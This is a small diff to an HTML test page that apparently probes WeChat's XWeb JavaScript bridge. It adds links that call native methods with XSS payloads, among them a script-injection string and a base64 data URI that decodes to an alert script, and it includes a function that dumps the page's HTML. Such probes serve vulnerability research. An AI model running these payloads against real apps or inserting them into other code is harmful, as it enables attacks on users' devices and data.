--- a/wei.html
+++ b/wei.html
@@ -3,6 +3,7 @@
     function leak() { alert(document.body.innerHTML); }
   </script>
   <a href="javascript:WeixinJSContext.allocEmpty()" onclick="leak()">CLICK</a>
-  <a href="javascript:xwebToNative.onVideoError(1, "<script>alert(1);</script>")">onVideoError</a>
+  <a href="javascript:xwebToNative.onVideoError(1, '<script>alert(1);</script>')">onVideoError</a>
+  <a href="javascript:xwebToNative.onVideoEnterFullscreen(false, 0, 0, 0, false, false, 0, 0, [])">onVideoEnterFullscreen</a>
+  <a href="javascript:xwebToNative.onVideoGetFrame(0, 0, 'data:image/png;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==')">onVideoGetFrame</a>
 </body> 
-    
